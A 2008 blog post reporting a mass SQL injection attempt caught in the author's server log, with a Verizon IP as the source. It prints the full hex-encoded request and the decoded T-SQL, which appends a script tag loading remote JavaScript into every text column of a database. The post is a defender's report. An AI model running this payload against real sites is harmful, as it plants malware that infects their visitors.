Article 43

 

New SQL Attack

This morning’s weblog had some INTERESTING STUFF:

72.74.129.44 - - /index.php [09/Aug/2008:10:26:34 -0400] “GET /index.php?/weblog/’;DECLARE%20@S%20CHAR(4000);SET%20@S= CAST(0x4445434C415245204054207661726368617228323535292C404320766172636 86172283430303029204445434C415245205461626C655F437572736F7220435552534 F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797 36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D6 22E696420616E6420612E78747970653D27752720616E642028622E78747970653D393 9206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622 E78747970653D31363729204F50454E205461626C655F437572736F722046455443482 04E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C40432 05748494C4528404046455443485F5354415455533D302920424547494E20657865632 827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B404 32B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2 F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F73637269707 43E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223 E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E31303 0306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272 7294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544 F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4 C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S)

It translates to something like this:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update [’+@T+’] set [’+@C+’]=[’+@C+’]+’’"></title><malicious-script src="http://url-masked/csrss/w.js"> </malicious-script-><!--’’ where ‘+@C+’ not like ‘’%"></title><malicious-script src="http://url-masked/csrss/w.js"></malicious-script><!--’’’)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Looks like some poor VERIZON CUSTOMER’S COMPUTER may be OWN3D.

ANY OF US with unpatched or poorly maintiained systems can easily fall victim too, and do the dirty work for those out to steal our data.

Verizon’s security team was alerted.

Posted by Elvis on 08/09/08 •
Link to this articleLink to this article and comments
Home
 

Name:

Email:

Location:

URL:

Smileys

Remember my personal information

Notify me of follow-up comments?

Next entry: 2007 Union Membership Data

Previous entry: The Fire This Time?

<< Back to main

Home

Members:
Login | Register
Resumes | Members

In memory of the layed off workers of AT&T

Today's Diversion

The foundation of all Mental Illness is the unwillingness to experience legitimate suffering. - Carl Jung

Search


Advanced Search

Categories

Archives

Favorite Posts

Recent Entries

American Solidarity

Favorites

Statistics